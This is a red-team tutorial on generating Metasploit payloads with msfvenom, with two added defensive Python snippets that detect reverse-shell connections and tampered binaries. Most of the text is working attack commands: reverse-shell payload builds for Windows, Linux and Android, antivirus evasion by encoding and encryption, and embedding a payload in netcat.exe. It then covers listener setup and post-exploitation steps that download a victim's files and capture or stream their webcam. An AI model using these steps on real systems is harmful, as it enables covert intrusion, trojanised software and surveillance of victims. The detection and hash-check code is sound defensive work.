Creating a Custom Payload Using Msfvenom
In the world of cybersecurity, payload creation is a key skill, especially for red teamers. One of the most commonly used tools for this is Msfvenom, a versatile utility from the Metasploit Framework. It allows you to create payloads for various operating systems such as Windows, macOS, Linux, and Android.
Types of Payloads:
Bind Payload: The payload opens a listening port on the victim's machine and the attacker connects to it.
Reverse Payload: The victim's machine connects back to the attacker's listener. This is the more common choice, because outbound connections pass through most firewalls more easily than inbound ones.
Windows Reverse Shell Payload
Here's how to create a basic reverse shell payload for Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o payload.exe
Explanation:
msfvenom: The tool used to generate the payload.
-p: Specifies the payload type (in this case, a Windows Meterpreter reverse TCP shell).
LHOST: The attacker's IP address, i.e. where the victim connects back to.
LPORT: The port on which the attacker listens for the victim's connection. Any free port works; 4444 is the conventional default.
-f exe: Output format (Windows executable).
-o payload.exe: Name of the output file.
Note: You can also use .msi as an output format for Windows, just like .exe.
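From the defender's side, the reverse connection described above appears as an outbound connection from a freshly dropped executable to the listener's LHOST:LPORT. The following is an added example, not part of the original tutorial and not Metasploit code: it scores constructed Sysmon-style network-connection records (field names follow Sysmon Event ID 3) for exactly that pattern, combining a binary in a user-writable path with an uncommon or default handler port. The sample lines, the port lists and the threshold are assumptions to be tuned per environment.

```python
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style network-connection records (Event ID 3 fields, one per line).
# These are invented sample lines, not real telemetry.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\Mozilla Firefox\firefox.exe Initiated=true DestinationIp=203.0.113.10 DestinationPort=443",
    r"Image=C:\Users\alice\Downloads\payload.exe Initiated=true DestinationIp=198.51.100.7 DestinationPort=4444",
    r"Image=C:\Windows\System32\svchost.exe Initiated=true DestinationIp=10.0.0.5 DestinationPort=135",
    r"Image=C:\Users\alice\AppData\Local\Temp\netcat.exe Initiated=true DestinationIp=198.51.100.7 DestinationPort=4444",
    r"Image=C:\Users\alice\Downloads\setup.exe Initiated=true DestinationIp=203.0.113.20 DestinationPort=443",
    r"Image=C:\Windows\System32\svchost.exe Initiated=false DestinationIp=10.0.0.9 DestinationPort=49152",
]

# Ports a workstation process is normally expected to talk to (assumption, tune per site).
COMMON_PORTS = {22, 25, 53, 80, 123, 443, 465, 587, 993, 995}
# The habitual default handler port from the tutorial (assumption: extend with local knowledge).
DEFAULT_HANDLER_PORTS = {4444}
# Paths an ordinary user can write to, where dropped executables usually land.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData)\\|\\Temp\\", re.IGNORECASE)

# key=value pairs; values may contain spaces, so stop only before the next "key=" token.
FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return dict(FIELD.findall(line))


@dataclass
class Finding:
    image: str
    dest_ip: str
    port: int
    score: int
    reasons: list = field(default_factory=list)


def score_event(ev):
    """Score an outbound connection; return None for inbound or unparseable records."""
    if ev.get("Initiated", "").lower() != "true":
        return None
    try:
        port = int(ev["DestinationPort"])
    except (KeyError, ValueError):
        return None
    image = ev.get("Image", "")
    finding = Finding(image, ev.get("DestinationIp", ""), port, 0)
    if USER_WRITABLE.search(image):
        finding.score += 2
        finding.reasons.append("binary runs from a user-writable path")
    if port not in COMMON_PORTS:
        finding.score += 1
        finding.reasons.append(f"uncommon destination port {port}")
    if port in DEFAULT_HANDLER_PORTS:
        finding.score += 1
        finding.reasons.append("port matches a default handler port")
    return finding


def find_reverse_shell_candidates(lines, threshold=3):
    """Return findings at or above the threshold, in input order.

    A threshold of 3 means a user-writable path alone (score 2) is not enough:
    a downloaded installer talking to 443 stays quiet, while the same kind of
    binary calling an uncommon port is reported.
    """
    findings = []
    for line in lines:
        finding = score_event(parse_event(line))
        if finding is not None and finding.score >= threshold:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_reverse_shell_candidates(SAMPLE_EVENTS):
        print(f"{f.image} -> {f.dest_ip}:{f.port} (score {f.score}): {'; '.join(f.reasons)}")
```

Run as-is it reports payload.exe and netcat.exe; the svchost.exe connection to port 135 and the Downloads installer talking to 443 fall below the threshold, which is the trade-off the scoring is built around.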
Creating Payloads for Other OS:
For Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o payload.elf
For Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o payload.apk
Making Payloads Undetectable
To bypass antivirus detection, it's crucial to obfuscate the payload. This can be done using encoders
and encryption.
Encoder:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=127.0.0.1 LPORT=4444 -f exe -o ajay.exe
-e x86/shikata_ga_nai: Specifies the encoder.
-i 10: Applies 10 layers of encoding.
To view the available encoders, use the command msfvenom --list encoders.
Note: Be cautious with high iteration counts (e.g., 50, 100, 150), as they can cause the payload to crash. Stick to reasonable numbers like 10 or 20 for better reliability.
Encryption
msfvenom -p windows/meterpreter/reverse_tcp --encrypt aes256 --encrypt-key hello -f exe -o ajay.exe
--encrypt aes256: Specifies the encryption type.
--encrypt-key hello: Specifies the encryption key.
To view the available encryption types, use the command msfvenom --list encrypt.
Embedding Payload into Another Application
For even more stealth, you can embed your payload into an existing application (such as Netcat), which allows the legitimate application to run normally while also executing your payload. This can make it more difficult for security systems to detect.
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 --encrypt aes256 --encrypt-key ajay -x netcat.exe -k -f exe -o netcat.exe
x64: Specifies the target architecture. The encoder's architecture must match the payload's; x86/shikata_ga_nai is an x86 encoder, so it does not pair with an x64 payload.
-x netcat.exe: Embeds the payload into an executable (in this case, Netcat).
-k: Allows both the original executable (Netcat) and the payload to run simultaneously.
Note: By embedding the payload, the application (Netcat) will continue to work as expected, while
your payload will be executed in the background.
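Embedding a payload with -x changes the bytes of the host executable, so the simplest control on the defensive side is a known-good hash manifest compared against what is actually on disk. The following is an added example, not part of the original tutorial and not Metasploit code: the "binaries" are constructed byte strings standing in for a clean netcat.exe and a copy with extra bytes added, and the manifest is derived from the clean copy here (in practice it comes from the vendor release or a golden image). File names and the verdict labels are assumptions.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of a file's bytes."""
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for executables (not real PE files): a trusted copy of a tool,
# a second trusted file, and the tool with a block of extra bytes, standing in for a
# template binary that had code added to it.
CLEAN_NETCAT = b"MZ" + b"constructed clean netcat bytes " * 8
CLEAN_HELPER = b"constructed helper library bytes"
TAMPERED_NETCAT = CLEAN_NETCAT + b"\x90" * 64

# Known-good manifest: file name -> expected SHA-256. Assumption: produced at deployment
# time from trusted sources; here it is derived from the clean constants so the example
# runs offline.
KNOWN_GOOD = {
    "netcat.exe": sha256_hex(CLEAN_NETCAT),
    "helper.dll": sha256_hex(CLEAN_HELPER),
}


def verify_files(files: dict, manifest: dict) -> dict:
    """Compare on-disk files (name -> bytes) against the manifest (name -> hex digest).

    Verdicts: 'ok' (hash matches), 'modified' (present but hash differs, which is what a
    template with embedded code produces), 'unknown' (not in the manifest) and 'missing'
    (in the manifest but absent from disk).
    """
    verdicts = {}
    for name, data in files.items():
        expected = manifest.get(name)
        if expected is None:
            verdicts[name] = "unknown"
        elif hmac.compare_digest(sha256_hex(data), expected):
            verdicts[name] = "ok"
        else:
            verdicts[name] = "modified"
    for name in manifest:
        if name not in files:
            verdicts[name] = "missing"
    return verdicts


if __name__ == "__main__":
    # Constructed snapshot of a directory: the trojanised tool, an unexpected file,
    # and helper.dll gone.
    on_disk = {"netcat.exe": TAMPERED_NETCAT, "update.exe": b"constructed unknown bytes"}
    for name, verdict in sorted(verify_files(on_disk, KNOWN_GOOD).items()):
        print(f"{name:12s} {verdict}")
```

Any verdict other than "ok" is worth a look; "modified" on a tool that has not been updated is the signal this section's technique leaves behind, whatever encoder or encryption was applied to the payload inside it.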
Setting Up a Listener in Metasploit
After generating the payload using msfvenom, the next step is to set up a listener in Metasploit to
handle the reverse connection when the target system executes the payload. This is done using the
multi/handler module in Metasploit, which listens for incoming connections and launches the
session.
Start Metasploit Framework: Open your terminal and start Metasploit with the following command:
msfconsole
Use the Multi/Handler Module: Once inside the Metasploit console, load the multi/handler module,
which is used to handle connections from payloads like the reverse shell.
use exploit/multi/handler
Set the Payload Type: You need to specify the type of payload you're expecting to receive. For a
Windows reverse shell, you would set it like this:
set payload windows/meterpreter/reverse_tcp
Set LHOST and LPORT: Set the IP address (LHOST) and port (LPORT) that the listener will use to wait
for the reverse shell to connect back.
set LHOST 127.0.0.1
set LPORT 4444
Start the Listener: After setting the appropriate options, run the following command to start the listener.
exploit (or run)
Putting it all together:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1 (replace with your listening IP address)
set LPORT 4444
exploit (you can use run instead of exploit)
Downloading Files from the Target Machine
After successfully connecting to the target machine using the reverse shell payload, you can download files from the victim's machine.
To list the files, use the ls command and navigate to the directory containing the content you want to download.
Then run download ajay.txt (where ajay.txt is the file the attacker wants to download).
Use the cd command to change directories, e.g. cd Ajay (where Ajay is the directory name).
To list the available webcams, use the command webcam_list.
To take a picture using the victim's webcam, use the command webcam_snap.
Streaming the Webcam
To start a webcam stream, use the command webcam_stream.
To stop the stream, press Ctrl+C in your terminal.